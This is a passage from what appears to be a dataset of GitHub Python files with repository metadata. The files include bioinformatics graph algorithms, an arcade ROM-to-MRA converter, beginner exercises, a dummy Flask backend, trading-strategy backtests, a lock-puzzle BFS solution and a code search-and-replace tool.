job_idle_seconds = job_obj.job_interval # cada job tem seu tempo de espera especifico\n\n # executa o job em loop infinito, para o caso de ocorrer algum erro momentaneo\n while True:\n try:\n ret_ok = job_obj.run_job() # por enquanto, nao utiliza callbacks\n except:\n ret_ok = False\n # se o processamento foi realizado com sucesso, segue para proximo job:\n if ret_ok:\n break\n else:\n # aguarda um tempo antes de executar novamente\n time.sleep(job_idle_seconds)\n\n # aguarda periodo de tempo padrao, antes de executar proximo job:\n time.sleep(loop_wait)\n\n # finalizados todos os jobs, informa que o processamento foi ok:\n logger.info(\"Finalizados todos os jobs relativos a Bolsas de Valores.\")\n return 0\n\n# ----------------------------------------------------------------------------\n","repo_name":"olidv/Colethon","sub_path":"src/main/colethon/scheduler_bolsas.py","file_name":"scheduler_bolsas.py","file_ext":"py","file_size_in_byte":3789,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"6248873097","text":"import random\r\nimport copy\r\nfrom functools import reduce\r\nfrom itertools import product\r\n\r\n### HamiltonianCycle(Graph) ###\r\n# Input: The adjacency list of a directed graph.\r\n# Output: An Hamiltonian cycle in this graph.\r\n#\r\n# Sample Input:\r\n# 0 -> 3\r\n# 1 -> 0\r\n# 2 -> 1,6\r\n# 3 -> 2\r\n# 4 -> 2\r\n# 5 -> 4\r\n# 6 -> 5,8\r\n# 7 -> 9\r\n# 8 -> 7\r\n# 9 -> 6\r\n# Sample Output:\r\n# [8, 7, 9, 6, 5, 4, 2, 1, 0, 3]\r\n\r\ndef HamiltonianCycle(Graph):\r\n nodes = list(Graph.keys())\r\n Cycle = list()\r\n\r\n all_nodes_flag = 0\r\n while not all_nodes_flag: # while there are unexplored edges in Graph\r\n # initialization - starting node\r\n node_visit_mark = [0]*len(nodes) # mark which nodes were visited -> 1 = visited\r\n Cycle.append(random.choice(nodes)) # random start node\r\n node_visit_mark[nodes.index(Cycle[0])] = 1\r\n # other nodes\r\n next_node = random.choice(Graph[Cycle[0]])\r\n while not node_visit_mark[nodes.index(next_node)]: # while next was not visited\r\n Cycle.append(next_node)\r\n node_visit_mark[nodes.index(Cycle[-1])] = 1\r\n next_node = random.choice(Graph[Cycle[-1]])\r\n if all(node_visit_mark):\r\n all_nodes_flag = 1\r\n else:\r\n Cycle = list()\r\n return Cycle\r\n\r\n# ---------------------------------------------------------------------------------------------\r\n### EulerianCycle(Graph) ###\r\n# Code Challenge: Solve the Eulerian Cycle Problem.\r\n# Input: The adjacency list of an Eulerian directed graph.\r\n# Output: An Eulerian cycle in this graph.\r\n#\r\n# Sample Input:\r\n# 0 -> 3\r\n# 1 -> 0\r\n# 2 -> 1,6\r\n# 3 -> 2\r\n# 4 -> 2\r\n# 5 -> 4\r\n# 6 -> 5,8\r\n# 7 -> 9\r\n# 8 -> 7\r\n# 9 -> 6\r\n# -> Graph = {0:[3], 1:[0], 2:[1. 
6], 3:[2], 4:[2], 5:[4], 6:[5, 8], 7:[9], 8:[7], 9:[6]}\r\n# Sample Output:\r\n# 6->8->7->9->6->5->4->2->1->0->3->2->6\r\n\r\ndef EulerianCycle (Graph):\r\n # create edges list\r\n edges = []\r\n for n in list(Graph.keys()):\r\n for e in Graph[n]:\r\n edges.append((n, e))\r\n\r\n Cycle = []\r\n all_edges_flag = 0\r\n while not all_edges_flag: # while there are unexplored edges in Graph\r\n # initialization - starting edge\r\n edge_visit_mark = [0]*len(edges) # mark which edges were visited -> 1 = visited\r\n start_edge = random.choice(edges) # random start edge\r\n Cycle.append(start_edge[0])\r\n Cycle.append(start_edge[1])\r\n edge_visit_mark[edges.index(start_edge)] = 1\r\n # other edges\r\n next_edge = (Cycle[-1], random.choice(Graph[Cycle[-1]]))\r\n while not edge_visit_mark[edges.index(next_edge)]: # while next edge was not visited\r\n Cycle.append(next_edge[1])\r\n edge_visit_mark[edges.index(next_edge)] = 1\r\n next_edge = (Cycle[-1], random.choice(Graph[Cycle[-1]]))\r\n if all(edge_visit_mark): # and Graph[Cycle[-1]] == Cycle[0]:\r\n all_edges_flag = 1\r\n else:\r\n Cycle = list()\r\n return Cycle\r\n\r\n## another version\r\ndef EulerianCycle_v2(Graph):\r\n edge_dict = copy.deepcopy(Graph)\r\n\r\n # initializing - choosing random start node\r\n cur_node = random.choice(list(edge_dict.keys()))\r\n Cycle = [cur_node]\r\n\r\n flag = 1\r\n while flag:\r\n Cycle.append(edge_dict[cur_node][0]) # add next node to Cycle\r\n\r\n # deleting the edge visited from edge_dict, if the node has no more edges -> deleting the node\r\n if len(edge_dict[cur_node]) == 1:\r\n del edge_dict[cur_node]\r\n else:\r\n edge_dict[cur_node] = edge_dict[cur_node][1:]\r\n\r\n # checking the cycle:\r\n if Cycle[-1] in edge_dict: # if next node has more edges (its in edge_dict), update cur_node and continue\r\n cur_node = Cycle[-1]\r\n else: # if next node has no more edges\r\n if len(edge_dict) > 0: # if there are unvisited edges, restart new Cycle\r\n edge_dict = copy.deepcopy(Graph)\r\n cur_node = random.choice(list(edge_dict.keys()))\r\n Cycle = [cur_node]\r\n print('B')\r\n else: # if there are no unvisited edges\r\n flag = 0\r\n return Cycle\r\n\r\n## fast version\r\ndef EulerianCycle_fast(edge_dict):\r\n '''Generates an Eulerian cycle from the given edges.'''\r\n current_node = list(edge_dict.keys())[0]\r\n path = [current_node]\r\n # Get the initial cycle.\r\n while True:\r\n path.append(edge_dict[current_node][0])\r\n\r\n if len(edge_dict[current_node]) == 1:\r\n del edge_dict[current_node]\r\n else:\r\n edge_dict[current_node] = edge_dict[current_node][1:]\r\n\r\n if path[-1] in edge_dict:\r\n current_node = path[-1]\r\n else:\r\n break\r\n\r\n # Continually expand the initial cycle until we're out of edge_dict.\r\n while len(edge_dict) > 0:\r\n for i in range(len(path)):\r\n if path[i] in edge_dict:\r\n current_node = path[i]\r\n cycle = [current_node]\r\n while True:\r\n cycle.append(edge_dict[current_node][0])\r\n\r\n if len(edge_dict[current_node]) == 1:\r\n del edge_dict[current_node]\r\n else:\r\n edge_dict[current_node] = edge_dict[current_node][1:]\r\n\r\n if cycle[-1] in edge_dict:\r\n current_node = cycle[-1]\r\n else:\r\n break\r\n\r\n path = path[:i] + cycle + path[i+1:]\r\n break\r\n return path\r\n\r\n# ---------------------------------------------------------------------------------------------\r\n### EulerianPath(Graph) ###\r\n#Code Challenge: Solve the Eulerian Path Problem.\r\n# Input: The adjacency list of a directed graph that has an Eulerian path.\r\n# Output: An Eulerian path in 
this graph.\r\n\r\n# Sample Input:\r\n# 0 -> 2\r\n# 1 -> 3\r\n# 2 -> 1\r\n# 3 -> 0,4\r\n# 6 -> 3,7\r\n# 7 -> 8\r\n# 8 -> 9\r\n# 9 -> 6\r\n# -> Graph = {0:[2], 1:[3], 2:[1], 3:[0,4], 6:[3, 7], 7:[8], 8:[9], 9:[6]}\r\n# Sample Output:\r\n# 6->7->8->9->6->3->0->2->1->3->4\r\n# -> [6, 7, 8, 9, 6, 3, 0, 2, 1, 3, 4]\r\n\r\ndef EulerianPath(edge_dict):\r\n # Determine the unbalanced edges.\r\n out_values = reduce(lambda a, b: a + b, edge_dict.values())\r\n for node in set(out_values + list(edge_dict.keys())):\r\n out_value = out_values.count(node)\r\n if node in edge_dict:\r\n in_value = len(edge_dict[node])\r\n else:\r\n in_value = 0\r\n\r\n if in_value < out_value:\r\n unbalanced_from = node\r\n elif out_value < in_value:\r\n unbalanced_to = node\r\n\r\n # Add an edge connecting the unbalanced edges.\r\n if unbalanced_from in edge_dict:\r\n edge_dict[unbalanced_from].append(unbalanced_to)\r\n else:\r\n edge_dict[unbalanced_from] = [unbalanced_to]\r\n\r\n # Get the Eulerian Cycle from the edges, including the unbalanced edge.\r\n cycle = EulerianCycle_fast(edge_dict)\r\n\r\n # Find the location of the unbalanced edge in the eulerian cycle.\r\n divide_point = list(filter(lambda i: cycle[i:i + 2] == [unbalanced_from, unbalanced_to], range(len(cycle) - 1)))[0]\r\n\r\n # Remove the unbalanced edge, and shift appropriately, overlapping the head and tail.\r\n return cycle[divide_point + 1:] + cycle[1:divide_point + 1]\r\n\r\n# ---------------------------------------------------------------------------------------------\r\n### universal_circular_string(k) ###\r\n# Code Challenge: Solve the k-Universal Circular String Problem.\r\n# Input: An integer k.\r\n# Output: A k-universal circular string.\r\n# Sample Input: 4\r\n# Sample Output: 0000110010111101\r\n\r\ndef universal_circular_string (k):\r\n # Create edges dict for binary k mers (2^k k mers)\r\n universal_dict = {}\r\n for kmer in [''.join(item) for item in product('01', repeat=k)]:\r\n if kmer[:-1] in universal_dict:\r\n universal_dict[kmer[:-1]].append(kmer[1:])\r\n else:\r\n universal_dict[kmer[:-1]] = [kmer[1:]]\r\n\r\n # Get the cycle:\r\n path = EulerianCycle_fast(universal_dict)\r\n # remove the repeated last entry for the associated path (last and first entry are overlapping):\r\n path_string = ''.join([item[0] for item in path[:-1]])\r\n return path_string\r\n\r\n# ---------------------------------------------------------------------------------------------\r\n### PairedComposition(k, d, Text) ###\r\n# Input: k and d integers and string Text\r\n# Output:(k,d)-mer composition of Text (list of lists) -> the collection of all (k,d)- mers in Text\r\n# (including repeated (k,d)-mers)\r\n# Given a string Text, a (k,d)-mer is a pair of k-mers in Text separated by distance d.\r\n# For example, [AAT,TGG] is a (3,4)-mer in TAATGCCATGGGATGTT.\r\n\r\n# Sample Input: 3, 1, 'TAATGCCATGGGATGTT'\r\n# Sample Output:\r\n# [[AAT,CCA], [ATG,CAT], [ATG,GAT], [CAT,GGA], [CCA,GGG], [GCC,TGG], ->\r\n# -> [GGA,GTT, [GGG,TGT], [TAA,GCC], [TGC,ATG], [TGG,ATG]]\r\n\r\ndef PairedComposition(k, d, Text):\r\n composition = []\r\n for i in range(len(Text)-2*k-d+1):\r\n composition.append([Text[i:i+k], Text[i+k+d:i+d+2*k]])\r\n sorted_composition = sorted(composition, key=lambda x: x[0])\r\n return sorted_composition\r\n\r\n# ---------------------------------------------------------------------------------------------\r\n### StringReconstructionFromPairs(k, d) ###\r\n# Challenge: Solve the String Reconstruction from Read-Pairs Problem.\r\n# Input: Integers k and d 
followed by a collection of paired k-mers PairedReads.\r\n# Output: A string Text with (k, d)-mer composition equal to PairedReads.\r\n\r\n# Sample Input: k = 4 ; d = 2 ;\r\n# [[GAGA,TTGA], [TCGT,GATG], [CGTG,ATGT], [TGGT,TGAG], [GTGA,TGTT], ->\r\n# -> [GTGG,GTGA], [TGAG,GTTG], [GGTC,GAGA], [GTCG,AGAT]]\r\n# Sample Output:\r\n# GTGGTCGTGAGATGTTGA\r\n\r\ndef StringReconstructionFromPairs(k, d, paired_kmers):\r\n\r\n ## Construct a dictionary of edges from the paired reads:\r\n # Graph: edge = paired kmers ((kmer1, kmer2)); node = prefix (start node) / suffix (end node)\r\n # the graph is represented by dictionery: key = prefix (start node of an edge); value = suffix (ending node of an edge)\r\n\r\n paired_kmers_dict = {}\r\n for pair in paired_kmers:\r\n if (pair[0][:-1], pair[1][:-1]) in paired_kmers_dict: # if paired prefix is in dict\r\n paired_kmers_dict[(pair[0][:-1], pair[1][:-1])].append((pair[0][1:], pair[1][1:])) # add paired suffix\r\n else: # if paired prefix is not in dict\r\n paired_kmers_dict[(pair[0][:-1], pair[1][:-1])] = [(pair[0][1:], pair[1][1:])] # add paired prefix (= key) and paired sufffix (= value)\r\n\r\n ## Get an eulerian path from the paired edges:\r\n paired_path = EulerianPath(paired_kmers_dict)\r\n\r\n ## Recombine the paths, accounting for their overlaps.\r\n strings = [paired_path[0][i] + ''.join(map(lambda x: x[i][-1], paired_path[1:])) for i in range(2)]\r\n return strings[0][:k + d] + strings[1]\r\n\r\n# ---------------------------------------------------------------------------------------------\r\n### ContigGeneration(kmers) ###\r\n# Contig Generation Problem: Generate the contigs from a collection of reads (with imperfect coverage).\r\n# Input: A collection of k-mers kmers.\r\n# Output: All contigs in DeBruijn(Patterns).\r\n\r\n# Sample Input: ['ATG', 'ATG', 'TGT', 'TGG', 'CAT', 'GGA', 'GAT', 'AGA']\r\n# Sample Output:['AGA', 'ATG', 'ATG', 'CAT', 'GAT', 'TGGA', 'TGT']\r\n\r\ndef flatten (l):\r\n return flatten(l[0]) + (flatten(l[1:]) if len(l) > 1 else []) if type(l) is list else [l]\r\n\r\ndef ContigGeneration (kmers):\r\n # Construct a dictionary of edges.\r\n edges = {}\r\n for kmer in kmers:\r\n if kmer[:-1] in edges:\r\n edges[kmer[:-1]].append(kmer[1:])\r\n else:\r\n edges[kmer[:-1]] = [kmer[1:]]\r\n\r\n # Determine the balanced and unbalanced edges.\r\n balanced, unbalanced = [], []\r\n out_values = reduce(lambda a, b: a + b, edges.values())\r\n for node in set(out_values + list(edges.keys())):\r\n out_value = out_values.count(node)\r\n if node in edges:\r\n in_value = len(edges[node])\r\n else:\r\n in_value = 0\r\n\r\n if in_value == out_value == 1:\r\n balanced.append(node)\r\n else:\r\n unbalanced.append(node)\r\n\r\n # Generate the contigs.\r\n get_contigs = lambda s, c: flatten(\r\n [c + e[-1] if e not in balanced else get_contigs(e, c + e[-1]) for e in edges[s]])\r\n contigs = sorted(flatten([get_contigs(start, start) for start in set(unbalanced) & set(edges.keys())]))\r\n return contigs\r\n\r\n\r\n","repo_name":"zoharg2403/Coursera-Bioinfprmatics-II","sub_path":"Bioinformatics2_2.py","file_name":"Bioinformatics2_2.py","file_ext":"py","file_size_in_byte":12765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"36600915212","text":"import sys\nimport re\nimport zipfile\nimport os\n\ndef lreplace(pattern, sub, string):\n \"\"\"\n Replaces 'pattern' in 'string' with 'sub' if 'pattern' starts 'string'.\n \"\"\"\n return re.sub('^%s' % pattern, sub, string)\n\ndef 
load_file(filename):\n with open(filename) as fp:\n\n # create a list\n romlist=[]\n current_entry=None\n # do stuff with fp \n line = fp.readline()\n cnt = 1\n zip1p = re.compile('set zip1=(.*)')\n zip2p = re.compile('set zip2=(.*)')\n ifilesp = re.compile('set ifiles=(.*)')\n md5p= re.compile('set md5valid=(.*)')\n ofilep= re.compile('set *ofile=(.*)')\n fullnamep= re.compile('set fullname=(.*)')\n while line:\n #print(\"Line {}: {}\".format(cnt, line.strip()))\n ar1=zip1p.findall(line)\n zip1=''\n if (ar1):\n zip1=ar1[0]\n if (zip1):\n if (current_entry):\n romlist.append(current_entry)\n current_entry={}\n current_entry['zip1']=zip1.strip().replace('\\\\','/')\n ar1=zip2p.findall(line)\n if (ar1):\n current_entry['zip2']=ar1[0].strip().replace('\\\\','/')\n ar1=ifilesp.findall(line)\n if (ar1):\n\n current_entry['ifiles']=ar1[0].strip().replace('\\\\','/').split('+')\n ar1=md5p.findall(line)\n if (ar1):\n current_entry['md5']=ar1[0].strip()\n ar1=ofilep.findall(line)\n if (ar1):\n current_entry['ofile']=ar1[0].strip()\n ar1=fullnamep.findall(line)\n if (ar1):\n current_entry['fullname']=ar1[0].strip()\n \n\n \n cnt += 1\n line = fp.readline()\n if (current_entry):\n romlist.append(current_entry)\n\n\n return romlist\n\ndef process_roms(romlist):\n print(romlist[0]['ofile'].split('.'))\n rbfname=romlist[0]['ofile'].split('.')[1]\n rbfname=rbfname.capitalize()\n if (rbfname==\"Dkong\"):\n rbfname=\"DonkeyKong\"\n elif (rbfname==\"Alibbt\"):\n rbfname=\"Alibaba\"\n elif (rbfname==\"Asteroid\"):\n rbfname=\"Asteroids\"\n elif (rbfname==\"Astdelux\"):\n rbfname=\"AsteroidsDeluxe\"\n elif (rbfname==\"Azurn\"):\n rbfname=\"AzurianAttack\"\n elif (rbfname==\"Blckhl\"):\n rbfname=\"BlackHole\"\n elif (rbfname==\"Bmbjck\"):\n rbfname=\"BombJack\"\n elif (rbfname==\"Brubbr\"):\n rbfname=\"BurningRubber\"\n elif (rbfname==\"Btime\"):\n rbfname=\"BurgerTime\"\n elif (rbfname==\"Bwidow\"):\n rbfname=\"BlackWidow\"\n elif (rbfname==\"Canyon\"):\n rbfname=\"CanyonBomber\"\n elif (rbfname==\"Centiped\"):\n rbfname=\"Centipede\"\n elif (rbfname==\"Cclimb\"):\n rbfname=\"CrazyClimber\"\n elif (rbfname==\"Ckong\"):\n rbfname=\"CrazyKong\"\n elif (rbfname==\"Crush\"):\n rbfname=\"CrushRoller\"\n elif (rbfname==\"Csmvng\"):\n rbfname=\"CosmicAvenger\"\n elif (rbfname==\"Ctcomb\"):\n rbfname=\"Catacomb\"\n elif (rbfname==\"Dorodn\"):\n rbfname=\"Dorodon\"\n elif (rbfname==\"Drmshp\"):\n rbfname=\"DreamShopper\"\n elif (rbfname==\"Frggr\"):\n rbfname=\"Frogger\"\n elif (rbfname==\"Galaxn\"):\n rbfname=\"Galaxian\"\n elif (rbfname==\"Gorkns\"):\n rbfname=\"Gorkans\"\n elif (rbfname==\"Ladybg\"):\n rbfname=\"LadyBug\"\n elif (rbfname==\"Lizwiz\"):\n rbfname=\"LizardWizard\"\n elif (rbfname==\"Llander\"):\n rbfname=\"LunarLander\"\n elif (rbfname==\"Mspcmn\"):\n rbfname=\"MsPacman\"\n elif (rbfname==\"Orbtrn\"):\n rbfname=\"Orbitron\"\n elif (rbfname==\"Pacclb\"):\n rbfname=\"PacmanClub\"\n elif (rbfname==\"Pacpls\"):\n rbfname=\"PacmanPlus\"\n elif (rbfname==\"Phnx\"):\n rbfname=\"Phoenix\"\n elif (rbfname==\"Ponpok\"):\n rbfname=\"Ponpoko\"\n elif (rbfname==\"Scrmbl\"):\n rbfname=\"Scramble\"\n elif (rbfname==\"Snpjck\"):\n rbfname=\"SnapJack\"\n elif (rbfname==\"Sprglb\"):\n rbfname=\"SuperGlob\"\n elif (rbfname==\"Sbrkout\"):\n rbfname=\"SuperBreakout\"\n elif (rbfname==\"Tmplt\"):\n rbfname=\"TimePilot\"\n elif (rbfname==\"Travrusa\"):\n rbfname=\"TraverseUSA\"\n elif (rbfname==\"Vvcar\"):\n rbfname=\"VanVanCar\"\n elif (rbfname==\"Warbug\"):\n rbfname=\"WarOfTheBugs\"\n elif (rbfname==\"Wdpckr\"):\n 
rbfname=\"Woodpecker\"\n elif (rbfname==\"Xevs\"):\n rbfname=\"Xevious\"\n count = 0\n for rom in romlist:\n ofilename=rom['ofile'].replace('.rom','.mra')\n if count==0:\n ofiledir='_newarcade/'\n os.makedirs(ofiledir,exist_ok=True)\n ofilename=ofiledir+rbfname+'.mra'\n else:\n ofiledir='_newarcade/_hacks/_'+rbfname+'/'\n os.makedirs(ofiledir,exist_ok=True)\n ofilename=ofiledir+ofilename\n\n with open(ofilename,\"w\") as fp:\n zf1= zipfile.ZipFile(rom['zip1'], 'r')\n try:\n zf2= zipfile.ZipFile(rom['zip2'], 'r')\n mrazip2=lreplace('MAME/','',rom['zip2'])\n except KeyError:\n print ('ERROR: Did not find zip2')\n\n mrazip1=lreplace('MAME/','',rom['zip1'])\n\n fp.write('\\n')\n fp.write(' {}\\n'.format(rbfname))\n fp.write(' \\n'.format(mrazip1,rom['md5']))\n for part in rom['ifiles']:\n\n if part[0]=='\"':\n part=part.strip('\"')\n if part[0]=='.' and part[1]=='.':\n rfname=part.replace('../','')\n print('GOT REAL FILE {}'.format(rfname))\n with open(rfname,'rb') as rfp:\n fp.write(' \\n')\n hexcount=1\n byte = rfp.read(1)\n while byte:\n fp.write(byte.hex()+' ')\n if (not (hexcount %16)):\n fp.write('\\n')\n byte=rfp.read(1)\n hexcount=hexcount+1\n fp.write(' \\n')\n else:\n try:\n info = zf1.getinfo(part)\n except KeyError:\n print ('ERROR: Did not find %s in zip file' % part )\n try:\n info = zf2.getinfo(part)\n except KeyError:\n print ('ERROR: Did not find %s in zip file ' % part )\n else:\n print ('%s is %d bytes' % (info.filename, info.file_size))\n fp.write(' \\n'.format(mrazip2,part))\n else:\n print ('%s is %d bytes' % (info.filename, info.file_size))\n fp.write(' \\n'.format(part))\n fp.write(' ')\n fp.write(' ')\n print(rom)\n count=count+1\n\n\nif __name__ == \"__main__\":\n for arg in sys.argv:\n if (arg!=sys.argv[0]):\n romlist=load_file(arg)\n process_roms(romlist)\n","repo_name":"alanswx/MraExamples","sub_path":"bruno_bat_convert.py","file_name":"bruno_bat_convert.py","file_ext":"py","file_size_in_byte":6952,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"22"} +{"seq_id":"31263624255","text":"class Dog:\n def __init__(self, name, age):\n self.name = name\n self.age = age\n\n def sit(self):\n print(f\"{self.name} is now sitting.\")\n\n def roll_over(self):\n print(f\"{self.name} rolled over!\")\n\n\nmy_dog = Dog('Willie', 6)\nprint(f\"My dog's name is {my_dog.name}\")\nprint(f\"My dog is {my_dog.age} year old.\")\nmy_dog.sit()\nmy_dog.roll_over()\n\n\nyour_dog = Dog('Lucy', 3)\nprint(f\"Your dog's name is {your_dog.name}\")\nprint(f\"Your dog is {your_dog.age} year old.\")\nyour_dog.sit()\nyour_dog.roll_over()\n\n\nsuper_dog = Dog('SUPER', 27)\nprint(f\"This dog's name is {super_dog.name}\")\nprint(f\"This dog is {super_dog.age} year old.\")\nsuper_dog.sit()\nsuper_dog.roll_over()\n","repo_name":"DimaBaltin/test1","sub_path":"Class/new clas.py","file_name":"new clas.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"28505734123","text":"from flask import Flask, request, jsonify\nimport json\nfrom flask_cors import CORS\n\napp = Flask(__name__)\nCORS(app)\n\n@app.route('/chat_test', methods=['POST'])\ndef chat_test():\n data = json.loads(request.get_data())\n print(data)\n print('Model: ' + data['model'])\n print('Prompt: ' + data['prompt'])\n response = {'status': input('type status: '), 'message': input('type response: ')}\n response = json.dumps(response)\n return response, 200\n\nif __name__ == '__main__':\n 
app.run()\n","repo_name":"UEFI-code/BachelorGraduationDesign","sub_path":"Frontend/dummyBackend.py","file_name":"dummyBackend.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"35496618926","text":"#26.py\n\"\"\"\n26. Numa eleição existem três candidatos. Faça um programa que peça o número \ntotal de eleitores. Peça para cada eleitor votar e ao final mostrar o número\nde votos de cada candidato.\n\"\"\"\nq = int(input(\"Digite a quantidade de eleitores: \"))\nvotos = []\ns = 0\nx = 0\n\nwhile x <= q - 1:\n\tvotos.append(input(\"\\nVote a/b/c: \"))\n\tx += 1\n\nx = 0\nk1 = 0\nk2 = 0\nk3 = 0\nwhile x <= q - 1:\n\tif votos[x] in 'a':\n\t\tk1 += 1\n\telif votos[x] in 'b':\n\t\tk2 += 1\n\telif votos[x] in 'c':\n\t\tk3 += 1\n\tx += 1\n\nprint('\\nCandidato a %d votos' %k1)\nprint('\\nCandidato b %d votos' %k2)\nprint('\\nCandidato c %d votos' %k3) ","repo_name":"VictorBezpy/EstruturaDeRepeticao","sub_path":"26.py","file_name":"26.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"24624564374","text":"import pandas_datareader as pdr\r\nfrom datetime import datetime\r\nfrom datetime import timedelta\r\nimport pandas as pd\r\nfrom backtesting import Backtest, Strategy\r\nfrom backtesting.lib import crossover\r\n\r\ndef SMA(values, n):\r\n return pd.Series(values).rolling(n).mean()\r\ndef EMA(values, n):\r\n return pd.Series(values).ewm(span=n,min_periods=0, adjust=False).mean()\r\ndef RSI(array, n=14):\r\n gain = pd.Series(array).diff()\r\n loss = gain.copy()\r\n gain[gain < 0] = 0\r\n loss[loss > 0] = 0\r\n rs = gain.ewm(span=n,min_periods=0,adjust=False).mean()/loss.abs().ewm(span=n,min_periods=0,adjust=False).mean()\r\n return 100 - 100 / (1 + rs)\r\n \r\nclass SMAC(Strategy):\r\n\t\tdef init(self):\r\n\t\t\tprice = self.data.Close\r\n\t\t\tself.sma1 = self.I(SMA, price, 10)\r\n\t\t\tself.sma2 = self.I(SMA, price, 20)\r\n\t\tdef next(self):\r\n\t\t\tif crossover(self.sma1, self.sma2):\r\n\t\t\t\tself.buy()\r\n\t\t\telif crossover(self.sma2, self.sma1):\r\n\t\t\t\tself.sell()\r\nclass EMAC(Strategy):\r\n def init(self):\r\n price = self.data.Close\r\n self.ema1 = self.I(EMA, price, 7)\r\n self.ema2 = self.I(EMA, price, 27)\r\n self.ema3 = self.I(EMA, price, 200)\r\n def next(self):\r\n if crossover(self.ema1, self.ema3):\r\n self.buy()\r\n elif crossover(self.ema3, self.ema1) and crossover(self.ema2, self.ema1):\r\n self.sell()\r\n\r\nclass RSISystem(Strategy):\r\n def init(self):\r\n price= self.data.Close\r\n self.RSIData = self.I(RSI,price,14)\r\n self.ema3 = self.I(EMA, price, 5)\r\n self.ema4 = self.I(EMA, price, 10)\r\n def next(self):\r\n if not self.position and self.RSIData<30 and crossover(self.ema4, self.ema3): \r\n self.buy()\r\n elif self.RSIData>70 and crossover(self.ema3, self.ema4):\r\n if self.position.size>0:\r\n self.position.close()\r\n\r\n# stock = pdr.get_data_yahoo(symbols='SPY', start = datetime.today()-timedelta(days=3652), end =datetime.today())\r\nstock = pdr.get_data_yahoo(symbols='SPY', start = '2011-12-1', end ='2021-12-1')\r\n\r\nbt = Backtest(stock, EMAC,cash=10000, commission = 0.000,\r\n exclusive_orders= 
True)\r\n\r\nprint(bt.run())","repo_name":"DanielPace14/Backtesting","sub_path":"Backtesting.py","file_name":"Backtesting.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"5663480593","text":"from collections import deque \n\nclass Solution:\n def openLock(self, deadends: List[str], target: str) -> int:\n queue = deque()\n\n queue.append([[\"0\", \"0\", \"0\", \"0\"], 0])\n turns = 0 \n deadends = set(deadends)\n visited = set()\n while queue:\n currentNode, cost = queue.popleft()\n # print(currentNode, cost)\n tuplified = tuple(currentNode)\n if tuplified in visited:\n continue \n currentString = \"\".join(currentNode)\n if currentString == target:\n return cost \n if currentString in deadends:\n continue \n\n \n visited.add(tuple(currentNode))\n for index, char in enumerate(currentNode):\n newChar = getNextChar(char)\n newChar2 = getPrevChar(char)\n tempCopy = currentNode[:]\n tempCopy2 = currentNode[:]\n tempCopy[index] = newChar \n tempCopy2[index] = newChar2\n queue.append([tempCopy, cost + 1])\n queue.append([tempCopy2, cost + 1])\n \n\n \n return -1\n \n \ndef getPrevChar(currentChar):\n current = int(currentChar)\n current -= 1 \n if current < 0:\n current = 9 \n return str(current)\n \ndef getNextChar(currentChar):\n current = int(currentChar)\n current += 1 \n if current == 10:\n current = 0 \n return str(current)","repo_name":"KaiKaizxc/Data-stuctures-and-algo","sub_path":"Graphs/752. Open the Lock.py","file_name":"752. Open the Lock.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"22"} +{"seq_id":"9743495224","text":"\nimport devon, devon.projects\nfrom devon.tags import *\nimport fnmatch, glob, mmap, os.path, re, sys\n\nreNewLine = re.compile(\"\\n\")\n\n# **************************************************************************************************\n\ndef search(path, terms, out, replaceTerms=None, fileTypes=None, caseSensitive=True):\n if not terms:\n return 0\n\n return searchDir(path, terms, replaceTerms, out, fileTypes, caseSensitive)\n\ndef searchProject(project, terms, out, replaceTerms=None, fileTypes=None, caseSensitive=True):\n if not terms:\n return 0\n \n projectFilePath = os.path.join(project.path, devon.projects.projectFileName)\n \n paths = [projectFilePath] \\\n + project.getSources() \\\n + project.getTestSources()\n\n if fileTypes:\n patterns = fileTypes.split(\",\")\n def fileFilter(path, patterns):\n for pattern in patterns:\n if fnmatch.fnmatch(path, pattern.strip()):\n return True\n return False\n paths = [path for path in paths if fileFilter(path, patterns)]\n\n findCount = 0\n\n for filePath in paths:\n fullPath = os.path.join(project.path, filePath)\n if os.path.isfile(fullPath) and isSearchable(fullPath):\n findCount += searchFile(fullPath, terms, replaceTerms, out, caseSensitive)\n \n for childProject in project.getChildProjects():\n findCount += searchProject(childProject, terms, out, \\\n replaceTerms, fileTypes, caseSensitive)\n\n return findCount\n \ndef searchDir(path, terms, replaceTerms, out, fileTypes):\n findCount = 0\n \n if fileTypes:\n dirNames = glob.glob(os.path.join(path, fileTypes))\n else:\n dirNames = os.listdir(path)\n\n for dirName in dirNames:\n if not dirName[0] == \".\":\n dirPath = os.path.join(path, dirName)\n if os.path.isdir(dirPath):\n findCount += searchDir(dirPath, terms, out)\n else:\n findCount += searchFile(dirPath, 
terms, out)\n\n return findCount\n \ndef searchFile(path, terms, replaceTerms, out, caseSensitive):\n findCount = 0\n \n reFlags = 0\n if not caseSensitive:\n reFlags |= re.IGNORECASE\n\n reTerms = re.compile(re.escape(terms), reFlags)\n\n if not replaceTerms == None:\n fd = os.open(path, os.O_RDWR)\n size = os.fstat(fd).st_size\n if size == 0:\n os.close(fd)\n return 0\n else:\n source = mmap.mmap(fd, size, access=mmap.ACCESS_WRITE)\n newSource, count = re.subn(reTerms, replaceTerms, source)\n source.close()\n \n if count == 0:\n os.close(fd)\n return 0 \n else:\n os.lseek(fd, 0, 0)\n os.ftruncate(fd, len(newSource))\n os.write(fd, newSource)\n os.close(fd)\n return count\n\n fd = os.open(path, os.O_RDONLY)\n size = os.fstat(fd).st_size\n if size == 0:\n os.close(fd)\n return 0\n else: \n source = mmap.mmap(fd, size, access=mmap.ACCESS_READ)\n \n termsLen = len(terms)\n index = 0\n while 1:\n m = reTerms.search(source, index)\n if not m:\n break\n \n findCount += 1\n index = m.start()\n \n lineCount, lineBegin, lineEnd = countLines(source, index)\n snippet = source[lineBegin:lineEnd]\n col1 = 